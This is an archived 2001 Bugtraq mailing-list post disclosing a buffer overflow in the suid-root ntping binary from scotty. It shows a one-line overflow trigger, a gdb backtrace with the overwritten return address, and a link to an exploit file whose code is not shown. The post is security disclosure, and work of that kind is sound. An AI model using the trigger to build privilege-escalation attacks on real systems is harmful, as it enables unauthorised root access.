Bugtraq mailing list archives
suid scotty (ntping) overflow (fwd)
From: "Larry W. Cashdollar" <lwc () Vapid dhs org>
Date: Thu, 21 Jun 2001 10:55:48 -0400 (EDT)
This has circulated on vuln-dev not sure if it made it here yet. Vendor has been notified and released a fixed version 2.1.11. My exploit: http://vapid.dhs.org/ntping_exp.c There is a much better exploit out there, but I am not sure if I have permission to distribute it. So I will leave that to the author. Credit: KF <dotslash () snosoft com> ---------- Forwarded message ---------- Date: Tue, 12 Jun 2001 05:34:16 -0400 From: KF <dotslash () snosoft com> To: vuln-dev () securityfocus com Subject: suid scotty (ntping) overflow I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'` Segmentation fault (core dumped) Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/ What led me to research this: arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:
i run scotty-testsuite: what must i change on my system:(Linux slackware): ==== Test generated error: can not connect straps socket: Permission denied
straps and ntping must be installed suid root. ^------- Hrmm I sure thought that was interesting to know *grin* Vendors affected: unknown by the author of this document just a note I found however... <19990702221232.79B119410 () Galois suse de> Hi folks, here is the long promised posting of all suid/sgid files on a alpha of SuSE Linux 6.2 ... comments on wrong permissions are welcome. Please note that SuSE has got 5 full CD-Roms so thats the reason for the many many files ... (and too much suid/sgid ones ...) ... -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps ... [root@linux d0tslash]# gdb /usr/bin/ntping core GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 This GDB was configured as "i386-mandrake-linux"... (no debugging symbols found)... Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done. Loaded symbols for /lib/libnsl.so.1 Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/libresolv.so.2 Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 #0 0x40079b66 in getenv () from /lib/libc.so.6 (gdb) bt #0 0x40079b66 in getenv () from /lib/libc.so.6 #1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6 #2 0x4013b9de in __res_ninit () from /lib/libc.so.6 #3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6 #4 0x4013ff5f in gethostbyname () from /lib/libc.so.6 #5 0x080495b8 in _start () #6 0x41414141 in ?? () Cannot access memory at address 0x41414141 -KF
Attachment:
ntping_exp.c
Description:
Current thread:
- suid scotty (ntping) overflow (fwd) Larry W. Cashdollar (Jun 21)
- Re: suid scotty (ntping) overflow (fwd) Kris Kennaway (Jun 22)